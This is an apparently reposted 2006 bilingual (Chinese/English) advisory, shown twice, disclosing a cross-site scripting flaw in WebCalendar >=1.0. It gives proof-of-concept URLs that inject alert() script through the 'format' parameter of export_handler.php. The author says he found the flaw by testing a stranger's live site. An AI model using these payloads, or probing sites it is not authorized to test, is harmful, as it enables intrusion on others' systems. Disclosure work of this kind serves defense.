CISVul20061219:WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities
2006-12-19 18:02
405 查看
==www.cciss.cn.==
==bbs.cciss.cn.==
WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities
|=---=[ WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities ]---=|
|=-----------------------------------------------------------------=|
|=---------------=[ 7all<7all7_at_163.com> ]=----------------------=|
|=-----------------------------------------------------------------=|
|=---------------=[ Copyright:www.cciss.cn ]=----------------------=|
--]介绍
Vul Version:WebCalendar>=1.0
Home Page: http://webcalendar.sourceforge.net/
漏洞发现:7all
--]备注
今天浏览一个站点时,无意间想测试下该站点的安全性,在找了几十分钟后发现该
版本的WebCalendar存在XSS漏洞,并下载了最新版本进行了测试,同样存在该漏洞.
该漏洞已经提交给secunia.com
--]利用办法 http://[website]/calendar/export_handler.php?format=<body+onload=alert(1111)>&id=200 http://[website]/calendar/export_handler.php?format=<img+src=http://www.cciss.cn/img/logo.gif+onload=alert(1111)>&id=200
English Version
--]Intro
Vul Version:WebCalendar >=1.0
Home Page: http://webcalendar.sourceforge.net/
Vul Autor:7all
--]Remark
Today,i'm browse a website and find this vulnerability:)
--]Exploit http://[website]/calendar/export_handler.php?format=<body+onload=alert(1111)>&id=200 /calendar/export_handler.php?format=<img+src=http://www.cciss.cn/img/logo.gif+onload=alert(1111)>&id=200]http://[website]/calendar/export_handler.php?format=<img+src=http://www.cciss.cn/img/logo.gif+onload=alert(1111)>&id=200
==bbs.cciss.cn.==
WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities
|=---=[ WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities ]---=|
|=-----------------------------------------------------------------=|
|=---------------=[ 7all<7all7_at_163.com> ]=----------------------=|
|=-----------------------------------------------------------------=|
|=---------------=[ Copyright:www.cciss.cn ]=----------------------=|
--]介绍
Vul Version:WebCalendar>=1.0
Home Page: http://webcalendar.sourceforge.net/
漏洞发现:7all
--]备注
今天浏览一个站点时,无意间想测试下该站点的安全性,在找了几十分钟后发现该
版本的WebCalendar存在XSS漏洞,并下载了最新版本进行了测试,同样存在该漏洞.
该漏洞已经提交给secunia.com
--]利用办法 http://[website]/calendar/export_handler.php?format=<body+onload=alert(1111)>&id=200 http://[website]/calendar/export_handler.php?format=<img+src=http://www.cciss.cn/img/logo.gif+onload=alert(1111)>&id=200
English Version
--]Intro
Vul Version:WebCalendar >=1.0
Home Page: http://webcalendar.sourceforge.net/
Vul Autor:7all
--]Remark
Today,i'm browse a website and find this vulnerability:)
--]Exploit http://[website]/calendar/export_handler.php?format=<body+onload=alert(1111)>&id=200 /calendar/export_handler.php?format=<img+src=http://www.cciss.cn/img/logo.gif+onload=alert(1111)>&id=200]http://[website]/calendar/export_handler.php?format=<img+src=http://www.cciss.cn/img/logo.gif+onload=alert(1111)>&id=200
相关文章推荐
- Lucene.Net ultra fast search for MVC or WebForms site => made easy!
- 【常见Web应用安全问题】---1、Cross Site Scripting
- 【常见Web应用安全问题】---1、Cross Site Scripting
- 基于Web应用程序的安全问题之一Cross-Site Scripting Vulnerabilities
- 【常见Web应用安全问题】---1、Cross Site Scripting
- Web安全之XSS(Cross Site Scripting)深入理解
- weblogic配置:<prefer-web-inf-classes>true</prefer-web-inf-classes>
- JSP-->web应用中属性文件使用
- java_web初学笔记之<Jsp四个域对象page/request/session/application>
- HTML5特性 > 本地储存 >HTML5 Web本地存储
- poe.xml 出现web.xml is missing and <failOnMissingWebXml> is set to true的错误
- eclipse环境Dynamic web module version 3.1版本的进步,简化Dynamic web object 中Servlet类的配置,不用web.xml配置<Servlet>
- XSS (Cross-Site-Scripting)笔记
- org.objectweb.asm.ClassWriter.<init>(I)V和org.objectweb.asm.ClassWriter.<init>(Z)V
- JSP 2.0 web.xml不再直接支持<taglib>标签配置
- 关于简单SSH框架中的web.xml的那些配置要点---->菜鸟一定要看哦
- web项目总结 >> 待续
- Scripting <path> data in SVG (reading and modifying)
- XSS(Cross-site-scripting)跨站脚本攻击
- 用javascript操作xml-->Web设计中如何使用XML数据源对象(转载)